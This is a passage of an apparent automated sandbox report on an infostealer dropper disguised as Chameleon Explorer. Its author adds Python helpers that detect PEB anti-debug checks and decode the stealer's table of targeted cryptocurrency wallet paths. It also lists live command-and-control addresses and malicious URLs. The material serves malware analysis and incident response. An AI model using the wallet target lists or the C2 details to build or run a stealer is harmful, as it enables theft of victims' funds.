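    if len(nxt) >= 3 and nxt[0] == 0x8B and (nxt[1] & 0xC7) == (0x40 | rm):
        return nxt[2]
    # movzx r32, byte ptr [reg+disp8]    0F B6  01 rrr rm  disp8
    if len(nxt) >= 4 and nxt[:2] == b"\x0F\xB6" and (nxt[2] & 0xC7) == (0x40 | rm):
        return nxt[3]
    # cmp byte ptr [reg+disp8], imm8     80  01 111 rm  disp8 imm8
    if len(nxt) >= 4 and nxt[0] == 0x80 and nxt[1] == (0x78 | rm):
        return nxt[2]
    return None


def find_peb_accesses(code: bytes) -> List[PebAccess]:
    found = []
    for m in PEB_LOAD.finditer(code):
        rm = _dest_register(m.group(0))
        disp = _next_read_disp(code, m.end(), rm)
        if disp is None:
            field, verdict = "unknown", "unknown"
        else:
            field, verdict = PEB_FIELDS.get(disp, (f"PEB+0x{disp:02X}", "unknown"))
        found.append(PebAccess(m.start(), REGS[rm], field, verdict))
    return found


def triage(code: bytes) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for a in find_peb_accesses(code):
        counts[a.verdict] = counts.get(a.verdict, 0) + 1
    return counts


# Constructed code buffer (not bytes from update.exe): three PEB loads with
# different follow-ups, plus a fs:[0x18] TEB load that must not be flagged.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, fs:[0x30]
    "0F B6 40 02"            # movzx eax, byte ptr [eax+0x02]  -> BeingDebugged
    "64 8B 0D 30 00 00 00"   # mov ecx, fs:[0x30]
    "8B 41 0C"               # mov eax, [ecx+0x0C]             -> Ldr
    "64 A1 18 00 00 00"      # mov eax, fs:[0x18]  (TEB self pointer, ignored)
    "64 A1 30 00 00 00"      # mov eax, fs:[0x30]
    "8B 40 68"               # mov eax, [eax+0x68]             -> NtGlobalFlag
    "C3"                     # ret
)

if __name__ == "__main__":
    for a in find_peb_accesses(SAMPLE_CODE):
        print(f"+0x{a.offset:04X} {a.reg}: {a.field:14} {a.verdict}")
    print(triage(SAMPLE_CODE))
```

Run it over the .text section of the unpacked update.exe image (the 21.2.update.exe.400000.0.unpack artifact the Yara hits refer to) rather than the packed file on disk; a compiler may also schedule an unrelated instruction between the PEB load and the field read, in which case the access lands in the "unknown" bucket and deserves a manual look.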
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_0040A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A395
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe Process created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                    Source: C:\Users\user\AppData\Roaming\update.exe Process created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: ETVk1yP43q.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: cexplorer.exe, 00000001.00000002.1948284743.0000000002981000.00000020.00000001.01000000.0000000F.sdmp, cexplorer.tmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Shell_TrayWnd
                    Source: ChameleonFolder.exe, is-JAVSO.tmp.2.drBinary or memory string: Progman
                    Source: cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000000.1854728343.0000000000418000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: GetTaskbarPositionShell_TrayWnd
                    Source: cexplorer.exe, 00000001.00000002.1948284743.0000000002981000.00000020.00000001.01000000.0000000F.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: ProgmanU
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03555618 cpuid 2_2_03555618
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,2_2_0355A63C
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_03559ADC
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetLocaleInfoW,2_2_0356A948
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetLocaleInfoW,2_2_0356A8FC
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,20_2_03330460
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_0332F480
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: GetLocaleInfoA,21_2_00404BA8
                    Source: C:\Users\user\AppData\Roaming\update.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_004150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004150D7
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004065F0 GetUserNameW,21_2_004065F0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004167B4 GetTimeZoneInformation,21_2_004167B4
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035E735C GetVersionExW,2_2_035E735C
                    Source: C:\Users\user\AppData\Roaming\update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004186E421_2_004186E4
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004186E421_2_004186E4
                    Source: Yara matchFile source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Exodus
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Ethereum
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
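The wallet strings above are fragments of one in-memory target table. In each fragment the character just before a path has a code point equal to twice the path's length in characters: `6` (0x36 = 54) precedes the 27-character `%appdata%\Electrum\wallets\`, `>` (0x3E = 62) the 31-character `%appdata%\Electrum-LTC\wallets\`, `"` (0x22 = 34) the 17-character `%APPDATA%\Exodus\`, and so on for every field in the two strings. That is what a UTF-16LE byte count looks like once a string dump keeps only the low byte, but it is an inference from the strings in this report, not a documented AZORult structure. The decoder below is added here as an example and is not code from the report or from the sample: it splits such fragments back into fields, labels each as the directory to read, the Coins\<wallet> name the sample pairs with it (treated here as the output folder for the collected files) or a file mask, and expands the targets into directories to check on a suspected victim. The fragments it parses are the two strings quoted above; the field labels and the hunt_paths helper are the example's own.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Memory strings quoted in this report for update.exe.  The string dump renders each
# field's length prefix as a single character in front of the field.
DUMP_ELECTRUM = ('*6%appdata%\\Electrum\\wallets\\$Coins\\Electrum-LTC'
                 '>%appdata%\\Electrum-LTC\\wallets\\')
DUMP_JAXX = ('*.json,*.seco"%APPDATA%\\Exodus\\2Coins\\Jaxx\\Local Storage\\'
             ':%APPDATA%\\Jaxx\\Local Storage\\ Coins\\MultiBitHD'
             'pmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml'
             '*%APPDATA%\\MultiBitHD\\')


@dataclass
class Field:
    kind: str      # "target" (directory to read), "output" (Coins\<wallet> folder),
                   # "mask" (file name filter) or "other"
    text: str


def classify(text: str) -> str:
    if text.lower().startswith("%appdata%"):
        return "target"
    if text.startswith("Coins\\"):
        return "output"
    if "*" in text or "," in text:
        return "mask"
    return "other"


def split_fields(dump: str, start: int) -> Optional[List[str]]:
    """Read length-prefixed fields from `start`: the prefix character's code point is
    twice the field's character count (a UTF-16 byte length seen as one character).
    Returns None unless the fields consume the string exactly."""
    fields, i = [], start
    while i < len(dump):
        n = ord(dump[i])
        if n == 0 or n % 2 or i + 1 + n // 2 > len(dump):
            return None
        fields.append(dump[i + 1:i + 1 + n // 2])
        i += 1 + n // 2
    return fields if fields else None


def decode_dump(dump: str) -> Tuple[str, List[Field]]:
    """Try every start offset; the first one that parses to the end wins.  Whatever
    precedes it (a previous field's tail, or a field whose prefix was not printable)
    is returned as residue rather than silently dropped."""
    for start in range(len(dump)):
        fields = split_fields(dump, start)
        if fields is not None:
            return dump[:start], [Field(classify(f), f) for f in fields]
    return dump, []


def hunt_paths(dump: str, appdata: str) -> List[str]:
    """Directories the stealer would read on a host whose %APPDATA% is `appdata`."""
    _, fields = decode_dump(dump)
    return [appdata + f.text[len("%appdata%"):] for f in fields if f.kind == "target"]


if __name__ == "__main__":
    for dump in (DUMP_ELECTRUM, DUMP_JAXX):
        residue, fields = decode_dump(dump)
        print(f"residue={residue!r}")
        for f in fields:
            print(f"  {f.kind:7} {f.text}")
    print(hunt_paths(DUMP_JAXX, "C:\\Users\\user\\AppData\\Roaming"))
```

For the Jaxx fragment the leading `*.json,*.seco` comes back as residue: it is a real mask whose own prefix (13 characters, 0x1A) was not printable and so never reached the dump. On a suspected victim, pass os.environ["APPDATA"] to hunt_paths and check which of the returned directories exist; those are the wallets worth assuming stolen.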
                    Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology
                    Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising
                    Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application
                    Execution: 11 Windows Management Instrumentation | 2 Native API | 1 Scheduled Task/Job | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter
                    Persistence: 1 DLL Side-Loading | 1 Scheduled Task/Job | 111 Registry Run Keys / Startup Folder | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
                    Privilege Escalation: 1 DLL Side-Loading | 12 Process Injection | 1 Scheduled Task/Job | 111 Registry Run Keys / Startup Folder | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
                    Defense Evasion: 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 11 Software Packing | 1 DLL Side-Loading | 12 Masquerading | 1 Virtualization/Sandbox Evasion | 12 Process Injection | Indicator Removal from Tools | HTML Smuggling
                    Credential Access: 21 Input Capture | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow
                    Discovery: 2 System Time Discovery | 1 Account Discovery | 3 File and Directory Discovery | 157 System Information Discovery | 341 Security Software Discovery | 1 Virtualization/Sandbox Evasion | 3 Process Discovery | 1 Application Window Discovery | 3 System Owner/User Discovery
                    Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections
                    Collection: 1 Archive Collected Data | 1 Data from Local System | 21 Input Capture | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged
                    Command and Control: 2 Ingress Tool Transfer | 21 Encrypted Channel | 3 Non-Application Layer Protocol | 14 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement
                    Behavior Graph ID: 1583137  Sample: ETVk1yP43q.exe  Startdate: 02/01/2025  Architecture: WINDOWS  Score: 100
                    Start: www.chameleon-managers.com, neosoft-activator.appspot.com, 2 other IPs or domains; Suricata IDS alerts for network traffic, Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, 8 other signatures
                      ETVk1yP43q.exe (started)
                        network: 2no.co 104.21.79.229, 443, 49730 CLOUDFLARENET US United States
                        dropped: C:\Users\user\AppData\Roaming\update.exe (PE32); C:\Users\user\AppData\Roaming\cexplorer.exe (PE32); C:\Users\user\AppData\Local\...\aut5826.tmp (PE32)
                        signature: Binary is likely a compiled AutoIt script file
                        cexplorer.exe (started)
                          dropped: C:\Users\user\AppData\Local\...\cexplorer.tmp (PE32)
                          cexplorer.tmp (started)
                            dropped: C:\...\unins000.exe (copy) (PE32); C:\Program Files (x86)\...\is-SCGGO.tmp (PE32+); C:\Program Files (x86)\...\is-OJNBS.tmp (PE32); 14 other files (13 malicious)
                            ChameleonFolder.exe (started)
                              dropped: C:\...\Folder64.dll_backup (PE32+); C:\Program Files (x86)\...\Folder64.dll (PE32+); C:\Program Files (x86)\...\Folder.dll_backup (PE32); C:\Program Files (x86)\...\Folder.dll (PE32)
                            ChameleonExplorer.exe (started)
                              dropped: C:\...xplorerHelper32.dll_backup (PE32); C:\...xplorerHelper32.dll (PE32)
                            ChameleonExplorer.exe (started)
                              signature: Creates multiple autostart registry keys
                            ChameleonExplorer.exe (started)
                              network: ghs.googlehosted.com 142.250.185.115, 49731, 49739, 80 GOOGLE US United States; neosoft-activator.appspot.com 172.217.16.212, 443, 49732 GOOGLE US United States
                        update.exe (started)
                          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 4 other signatures
                          update.exe (started)
                            network: 92.63.192.63, 49854, 49858, 49866 ITDELUXE-AS RU Russian Federation
                      ChameleonFolder.exe (started)
                        dropped: C:\...xplorerHelper64.dll_backup (PE32+); C:\...xplorerHelper64.dll (PE32+)
                        signature: Creates multiple autostart registry keys
                        ChameleonFolder64.exe (started)
                      ChameleonExplorer.exe (started)
                        ChameleonFolder.exe (started)
                      6 other processes (started)

Source | Detection | Scanner | Label | Link
ETVk1yP43q.exe | 68% | ReversingLabs | Win32.Infostealer.Pony |
ETVk1yP43q.exe | 60% | Virustotal | | Browse
ETVk1yP43q.exe | 100% | Avira | TR/Dropper.VB.aqjnr |
ETVk1yP43q.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\update.exe | 100% | Avira | HEUR/AGEN.1362414 |
C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) | 2% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder.dll | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder64.dll | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-29AV0.tmp | 2% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-KSQ9G.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-OJNBS.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\is-SCGGO.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy) | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\aut5826.tmp | 2% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\cexplorer.exe | 2% | ReversingLabs | |
C:\Users\user\AppData\Roaming\update.exe | 79% | ReversingLabs | Win32.Infostealer.Fareit |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://92.63.192.63/ | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.html | 0% | Avira URL Cloud | safe |
https://dotbit.me/a/ | 0% | Avira URL Cloud | safe |
https://2no.co/1dHC37 | 100% | Avira URL Cloud | malware |
http://www.chameleon-managers.comc | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/subscription/?action=extend&key= | 0% | Avira URL Cloud | safe |
https://neosoft-activator.appspot.com/ | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.coms | 0% | Avira URL Cloud | safe |
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/info/versions/ | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/info/versions/k | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/reg.php?program= | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3t | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.comsK | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.comQN | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.comH | 0% | Avira URL Cloud | safe |
http://counter-strike.com.ua/ | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/subscription/?action=latest&key= | 0% | Avira URL Cloud | safe |
https://neosoft-activator.appspot.com/vB | 0% | Avira URL Cloud | safe |
http://www.palkornel.hu/innosetup%1 | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3_lmPlmP | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.php | 100% | Avira URL Cloud | malware |
http://www.chameleon-managers.com3Y4=A4=AhXInno | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/contacts.php?program= | 0% | Avira URL Cloud | safe |
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;z | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com | 0% | Avira URL Cloud | safe |
https://2no.co/redirect- | 100% | Avira URL Cloud | malware |
http://ocsp.startssl.com07 | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3j | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.phpv | 0% | Avira URL Cloud | safe |
https://cdn.iplogger.org/favicon.ico | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3h | 0% | Avira URL Cloud | safe |
http://ocsp.startssl.com00 | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3l | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3f | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign= | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3c | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3g | 0% | Avira URL Cloud | safe |
https://2no.co/1dHC37B | 100% | Avira URL Cloud | malware |
http://www.chameleon-managers.com3 | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3d | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3e | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.phpmswsock.dll.mui | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.htmlb | 0% | Avira URL Cloud | safe |
https://2no.co:443/1dHC37Users | 100% | Avira URL Cloud | malware |
http://92.63.192.63/index.html_ | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.comSQ | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com/0 | 0% | Avira URL Cloud | safe |
https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20 | 0% | Avira URL Cloud | safe |
http://92.63.192.63/index.phpM | 0% | Avira URL Cloud | safe |
http://www.chameleon-managers.com3V$mP$mP | 0% | Avira URL Cloud | safe |
https://2no.co/ | 100% | Avira URL Cloud | malware |
http://crl.u | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
2no.co | 104.21.79.229 | true | false | | unknown
ghs.googlehosted.com | 142.250.185.115 | true | false | | high
neosoft-activator.appspot.com | 172.217.16.212 | true | false | | unknown
www.chameleon-managers.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://92.63.192.63/index.html | true | Avira URL Cloud: safe | unknown
https://2no.co/1dHC37 | true | Avira URL Cloud: malware | unknown
http://www.chameleon-managers.com/info/versions/ | false | Avira URL Cloud: safe | unknown
http://92.63.192.63/index.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://92.63.192.63/ | update.exe, 00000015.00000003.2470147501.0000000000777000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://neosoft-activator.appspot.com/ | ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | cexplorer.exe, 00000001.00000000.1719947136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, cexplorer.exe.0.dr | false | | high
